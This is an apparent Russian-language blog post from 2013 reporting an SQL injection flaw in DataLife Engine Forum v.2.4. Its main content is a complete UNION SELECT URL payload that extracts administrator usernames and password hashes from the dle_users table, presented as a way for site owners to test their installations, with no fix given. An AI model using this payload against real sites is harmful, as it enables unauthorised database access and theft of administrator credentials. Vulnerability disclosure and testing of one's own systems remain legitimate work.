SQL – инъекция в DLE-Forum v.2.4 |
6-07-2013, 15:28 | автор: admin | категория: Создание сайтов | (комментариев: 0) | | |
В DataLife Engine Forum v.2.4 есть уязвимость, которая дозволяет исполнять запросы в бд, и узнавать всякую инфу, к примеру о логинах и о паролях.
У кого стоит данная версия форума, рекомендуется проверить на уязвимость: ваш_сайт.ру/?do=forum&showtopic=- 1+union+select+1,2,CONCAT_WS( 0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group=1+limit+1--, |
|
Похожие новости | |
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.